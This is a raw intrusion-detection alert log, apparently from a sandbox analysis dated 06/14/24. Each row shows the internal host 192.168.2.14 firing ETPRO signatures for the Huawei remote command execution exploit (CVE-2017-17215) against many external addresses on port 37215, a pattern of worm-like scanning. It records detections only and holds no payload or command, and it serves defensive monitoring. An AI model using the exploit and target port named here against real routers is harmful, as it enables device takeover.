                                            06/14/24-10:43:52.145933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547437215192.168.2.1441.176.178.117
                                            06/14/24-10:44:02.384441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4281437215192.168.2.14197.108.108.95
                                            06/14/24-10:44:04.419866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432437215192.168.2.14197.85.111.111
                                            06/14/24-10:43:41.910512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556237215192.168.2.14156.86.110.27
                                            06/14/24-10:44:00.319628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637637215192.168.2.1441.232.130.192
                                            06/14/24-10:44:33.151514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396037215192.168.2.14156.218.225.90
                                            06/14/24-10:43:43.941538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018237215192.168.2.1441.27.40.116
                                            06/14/24-10:44:20.828559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173237215192.168.2.14156.77.197.138
                                            06/14/24-10:44:26.977416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568837215192.168.2.14156.124.154.153
                                            06/14/24-10:44:31.053852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806437215192.168.2.14197.119.71.129
                                            06/14/24-10:44:31.055509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315637215192.168.2.14156.38.43.63
                                            06/14/24-10:43:45.967181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476837215192.168.2.14197.226.72.76
                                            06/14/24-10:44:10.580803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293237215192.168.2.14197.9.93.81
                                            06/14/24-10:44:33.152123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175637215192.168.2.1441.182.103.155
                                            06/14/24-10:44:00.326450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474237215192.168.2.14156.207.69.18
                                            06/14/24-10:44:10.547241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536037215192.168.2.14197.102.244.181
                                            06/14/24-10:44:02.381385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761437215192.168.2.1441.255.169.157
                                            06/14/24-10:44:06.472622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991637215192.168.2.14156.55.29.68
                                            06/14/24-10:44:26.977998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705837215192.168.2.14156.246.1.98
                                            06/14/24-10:44:29.024123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4657437215192.168.2.1441.212.75.202
                                            06/14/24-10:44:24.915745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515437215192.168.2.14156.163.217.73
                                            06/14/24-10:43:36.702259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478037215192.168.2.14197.63.24.17
                                            06/14/24-10:44:16.734421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5706037215192.168.2.14156.199.72.34
                                            06/14/24-10:43:34.661830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151237215192.168.2.1441.17.37.241
                                            06/14/24-10:43:56.230141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581437215192.168.2.1441.112.253.45
                                            06/14/24-10:44:12.625202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537837215192.168.2.14156.151.196.54
                                            06/14/24-10:43:37.759613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363437215192.168.2.14156.253.224.25
                                            06/14/24-10:43:36.729521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695037215192.168.2.1441.145.49.163
                                            06/14/24-10:44:20.829316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287837215192.168.2.1441.62.227.213
                                            06/14/24-10:44:08.521576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452637215192.168.2.14197.85.164.66
                                            06/14/24-10:44:20.806027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471037215192.168.2.14156.108.183.216
                                            06/14/24-10:44:20.830840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650237215192.168.2.1441.139.22.19
                                            06/14/24-10:43:43.941743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781437215192.168.2.14197.219.57.48
                                            06/14/24-10:43:39.811288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197637215192.168.2.14156.163.89.33
                                            06/14/24-10:44:04.406537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322637215192.168.2.14156.74.243.68
                                            06/14/24-10:43:39.808834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776037215192.168.2.1441.165.218.63
                                            06/14/24-10:44:12.645611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.14156.166.92.194
                                            06/14/24-10:44:29.013445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828437215192.168.2.14156.29.139.6
                                            06/14/24-10:44:10.547554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479037215192.168.2.14156.12.168.15
                                            06/14/24-10:43:52.163692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850437215192.168.2.1441.48.213.226
                                            06/14/24-10:43:54.185321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808637215192.168.2.14156.49.240.0
                                            06/14/24-10:43:45.990060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662837215192.168.2.14156.75.243.74
                                            06/14/24-10:43:36.702431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746237215192.168.2.14156.99.153.2
                                            06/14/24-10:44:16.736019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821637215192.168.2.14156.100.243.178
                                            06/14/24-10:44:02.366685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939437215192.168.2.1441.197.69.126
                                            06/14/24-10:43:54.182033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590437215192.168.2.1441.244.140.124
                                            06/14/24-10:44:08.517263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713237215192.168.2.1441.64.221.58
                                            06/14/24-10:44:00.325854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489837215192.168.2.14197.90.228.40
                                            06/14/24-10:44:20.829603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059837215192.168.2.14197.23.237.184
                                            06/14/24-10:43:56.252996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354437215192.168.2.14197.56.232.222
                                            06/14/24-10:43:58.291722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503437215192.168.2.14197.193.70.156
                                            06/14/24-10:44:33.132242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467037215192.168.2.1441.97.224.60
                                            06/14/24-10:43:34.675772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404837215192.168.2.14197.142.78.120
                                            06/14/24-10:43:48.027979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923437215192.168.2.14156.85.28.231
                                            06/14/24-10:44:29.012277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981837215192.168.2.14197.119.224.166
                                            06/14/24-10:44:24.914514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244437215192.168.2.1441.165.132.224
                                            06/14/24-10:43:48.045398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982637215192.168.2.1441.41.170.128
                                            06/14/24-10:44:14.683978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876037215192.168.2.14156.223.31.226
                                            06/14/24-10:43:48.016396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903437215192.168.2.14156.36.12.43
                                            06/14/24-10:44:00.325582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251237215192.168.2.1441.158.255.149
                                            06/14/24-10:43:36.725893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200637215192.168.2.1441.230.241.127
                                            06/14/24-10:43:39.807968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791837215192.168.2.14197.18.22.160
                                            06/14/24-10:44:33.133655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045037215192.168.2.1441.14.73.181
                                            06/14/24-10:44:04.408940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014837215192.168.2.1441.102.172.244
                                            06/14/24-10:44:31.084698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908637215192.168.2.1441.165.165.187
                                            06/14/24-10:44:12.625336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992437215192.168.2.1441.63.33.235
                                            06/14/24-10:44:12.640669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281437215192.168.2.1441.122.148.20
                                            06/14/24-10:44:14.669211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269637215192.168.2.1441.143.118.160
                                            06/14/24-10:44:08.520344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036837215192.168.2.1441.80.38.206
                                            06/14/24-10:44:20.831545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715437215192.168.2.14197.86.190.28
                                            06/14/24-10:44:18.766740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557437215192.168.2.1441.138.7.91
                                            06/14/24-10:44:26.977448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231637215192.168.2.14156.3.73.114
                                            06/14/24-10:43:36.718049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432237215192.168.2.14197.69.119.231
                                            06/14/24-10:43:39.792631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527637215192.168.2.14156.189.43.187
                                            06/14/24-10:43:52.162375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724637215192.168.2.1441.12.70.202
                                            06/14/24-10:44:26.979135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3320637215192.168.2.1441.184.251.154
                                            06/14/24-10:43:34.678853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506637215192.168.2.14156.115.89.207
                                            06/14/24-10:44:16.734301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514037215192.168.2.14156.89.69.61
                                            06/14/24-10:44:10.567515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922037215192.168.2.14197.137.147.49
                                            06/14/24-10:44:20.803456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914637215192.168.2.14156.60.220.19
                                            06/14/24-10:43:50.071340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068437215192.168.2.14197.54.135.165
                                            06/14/24-10:43:34.661523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496637215192.168.2.1441.145.71.139
                                            06/14/24-10:44:08.518411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791837215192.168.2.1441.188.157.176
                                            06/14/24-10:44:33.133241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976037215192.168.2.14197.151.33.241
                                            06/14/24-10:43:39.793058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338637215192.168.2.14197.37.35.158
                                            06/14/24-10:44:29.014527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524837215192.168.2.1441.19.237.243
                                            06/14/24-10:44:24.913355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498437215192.168.2.1441.121.89.209
                                            06/14/24-10:44:04.419531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675637215192.168.2.14156.4.134.182
                                            06/14/24-10:44:35.182228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600637215192.168.2.14156.62.32.40
                                            06/14/24-10:43:37.761807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022837215192.168.2.14197.11.114.110
                                            06/14/24-10:44:12.645291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.1441.138.40.192
                                            06/14/24-10:44:00.337828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186437215192.168.2.14197.159.198.68
                                            06/14/24-10:44:20.807156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547237215192.168.2.14197.207.221.141
                                            06/14/24-10:44:18.762033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386237215192.168.2.1441.0.149.107
                                            06/14/24-10:44:29.011180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717837215192.168.2.14156.143.32.203
                                            06/14/24-10:44:10.564805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523237215192.168.2.14197.162.219.233
                                            06/14/24-10:43:43.968141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.14156.13.210.169
                                            06/14/24-10:43:54.202331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304837215192.168.2.1441.244.159.254
                                            06/14/24-10:44:20.805720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3328237215192.168.2.1441.162.42.96
                                            06/14/24-10:43:48.032401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875437215192.168.2.1441.229.117.23
                                            06/14/24-10:44:20.805967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009237215192.168.2.14197.169.116.106
                                            06/14/24-10:44:33.150344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440437215192.168.2.14197.146.118.109
                                            06/14/24-10:43:52.159906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093837215192.168.2.1441.62.98.84
                                            06/14/24-10:43:54.182427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614437215192.168.2.1441.44.41.209
                                            06/14/24-10:43:45.984682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078837215192.168.2.14156.106.239.77
                                            06/14/24-10:43:34.675819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688037215192.168.2.1441.39.58.194
                                            06/14/24-10:44:33.150903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591637215192.168.2.14197.92.141.64
                                            06/14/24-10:44:00.325273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467837215192.168.2.1441.230.15.61
                                            06/14/24-10:44:04.410980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905237215192.168.2.14156.252.115.194
                                            06/14/24-10:43:48.021029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552637215192.168.2.14156.133.44.74
                                            06/14/24-10:44:33.152333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137837215192.168.2.1441.187.213.123
                                            06/14/24-10:43:36.700089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359837215192.168.2.14156.248.26.132
                                            06/14/24-10:43:50.075242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068237215192.168.2.14197.159.109.56
                                            06/14/24-10:44:20.805014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589437215192.168.2.14197.41.77.149
                                            06/14/24-10:43:34.660897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.14156.67.95.193
                                            06/14/24-10:43:56.227592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404437215192.168.2.14197.222.111.42
                                            06/14/24-10:44:22.861561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457837215192.168.2.14156.68.196.18
                                            06/14/24-10:44:10.564370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819837215192.168.2.14197.150.191.183
                                            06/14/24-10:43:41.907162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243037215192.168.2.14156.91.15.151
                                            06/14/24-10:44:04.408370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434837215192.168.2.1441.251.149.29
                                            06/14/24-10:44:24.916017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590637215192.168.2.1441.107.223.2
                                            06/14/24-10:43:41.846347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726837215192.168.2.14156.77.120.44
                                            06/14/24-10:44:26.980692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287837215192.168.2.1441.188.145.26
                                            06/14/24-10:44:08.503957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3745837215192.168.2.14156.235.138.47
                                            06/14/24-10:44:10.565849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661837215192.168.2.14197.96.104.224
                                            06/14/24-10:44:08.503729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675637215192.168.2.14197.178.164.241
                                            06/14/24-10:44:24.944276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055037215192.168.2.1441.201.83.157
                                            06/14/24-10:43:45.969071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655037215192.168.2.14156.40.24.251
                                            06/14/24-10:43:39.791204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650837215192.168.2.1441.241.223.81
                                            06/14/24-10:43:39.811104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550837215192.168.2.14197.66.231.125
                                            06/14/24-10:44:08.501717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462437215192.168.2.1441.131.52.39
                                            06/14/24-10:44:08.504379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999037215192.168.2.14156.116.6.111
                                            06/14/24-10:44:35.180722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286037215192.168.2.1441.77.74.200
                                            06/14/24-10:44:31.053801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345437215192.168.2.14156.63.103.94
                                            06/14/24-10:44:08.518125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.14156.218.112.84
                                            06/14/24-10:43:41.847917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219237215192.168.2.14156.78.200.17
                                            06/14/24-10:44:02.382459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243437215192.168.2.14197.124.119.54
                                            06/14/24-10:44:26.980725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630837215192.168.2.14156.45.171.151
                                            06/14/24-10:44:06.451942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767037215192.168.2.1441.225.199.225
                                            06/14/24-10:43:45.968358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863437215192.168.2.14156.15.65.123
                                            06/14/24-10:43:48.021590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440437215192.168.2.14156.107.252.247
                                            06/14/24-10:43:41.848128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072437215192.168.2.1441.255.10.162
                                            06/14/24-10:44:08.505047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998037215192.168.2.14197.199.39.150
                                            06/14/24-10:44:02.382051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381837215192.168.2.14156.54.214.167
                                            06/14/24-10:44:26.980080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464037215192.168.2.14197.229.133.226
                                            06/14/24-10:44:12.614540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381637215192.168.2.14197.181.197.88
                                            06/14/24-10:44:26.985070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522237215192.168.2.1441.70.105.46
                                            06/14/24-10:44:29.025164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054037215192.168.2.1441.4.82.67
                                            06/14/24-10:43:43.944551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717237215192.168.2.14156.202.13.234
                                            06/14/24-10:43:50.111642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484237215192.168.2.1441.90.109.93
                                            06/14/24-10:43:39.811871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027637215192.168.2.14156.149.204.29
                                            06/14/24-10:43:43.971883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044437215192.168.2.14156.186.136.121
                                            06/14/24-10:44:20.829227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651637215192.168.2.14197.170.225.243
                                            06/14/24-10:43:54.201132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851637215192.168.2.1441.118.164.170
                                            06/14/24-10:44:24.916392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920437215192.168.2.1441.219.11.238
                                            06/14/24-10:44:12.617380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609837215192.168.2.14156.160.59.163
                                            06/14/24-10:44:31.088850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759637215192.168.2.14197.117.10.242
                                            06/14/24-10:44:22.861712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815037215192.168.2.14197.27.158.11
                                            06/14/24-10:44:29.024526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664037215192.168.2.14156.34.214.9
                                            06/14/24-10:43:52.165160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316037215192.168.2.14197.62.96.247
                                            06/14/24-10:44:02.368343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294437215192.168.2.1441.88.169.138
                                            06/14/24-10:43:43.972151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187837215192.168.2.14197.250.252.72
                                            06/14/24-10:43:58.293748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441437215192.168.2.1441.239.179.29
                                            06/14/24-10:44:04.410540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411837215192.168.2.14156.36.209.203
                                            06/14/24-10:44:06.453930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838037215192.168.2.14197.187.36.6
                                            06/14/24-10:43:45.967516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063037215192.168.2.14197.71.197.103
                                            06/14/24-10:44:20.804157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503437215192.168.2.1441.72.79.10
                                            06/14/24-10:44:14.672398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252837215192.168.2.14156.141.25.45
                                            06/14/24-10:43:41.898385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539037215192.168.2.14197.150.139.3
                                            06/14/24-10:43:54.202804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634437215192.168.2.14197.131.111.51
                                            06/14/24-10:44:16.717457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666037215192.168.2.14197.91.80.15
                                            06/14/24-10:44:04.420898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695637215192.168.2.14197.126.229.162
                                            06/14/24-10:43:58.291645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232437215192.168.2.1441.62.120.12
                                            06/14/24-10:43:41.898139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646437215192.168.2.14197.49.222.147
                                            06/14/24-10:43:58.273510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669837215192.168.2.1441.255.211.29
                                            06/14/24-10:43:36.700032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702037215192.168.2.14156.41.125.115
                                            06/14/24-10:43:48.034018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566837215192.168.2.1441.97.135.205
                                            06/14/24-10:44:20.807207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313637215192.168.2.14156.114.186.197
                                            06/14/24-10:44:22.858288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5049237215192.168.2.14156.12.231.107
                                            06/14/24-10:44:26.984898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473037215192.168.2.1441.156.206.185
                                            06/14/24-10:44:14.670210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755637215192.168.2.14197.87.232.118
                                            06/14/24-10:44:12.618729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433237215192.168.2.1441.220.45.54
                                            06/14/24-10:44:00.344197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925237215192.168.2.14197.229.145.186
                                            06/14/24-10:44:04.421816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740037215192.168.2.14156.92.3.175
                                            06/14/24-10:43:43.967812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824037215192.168.2.1441.249.239.87
                                            06/14/24-10:44:08.504737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369237215192.168.2.14197.159.246.142
                                            06/14/24-10:43:58.274894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674837215192.168.2.14197.23.187.238
                                            06/14/24-10:44:22.880869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426037215192.168.2.14197.108.109.114
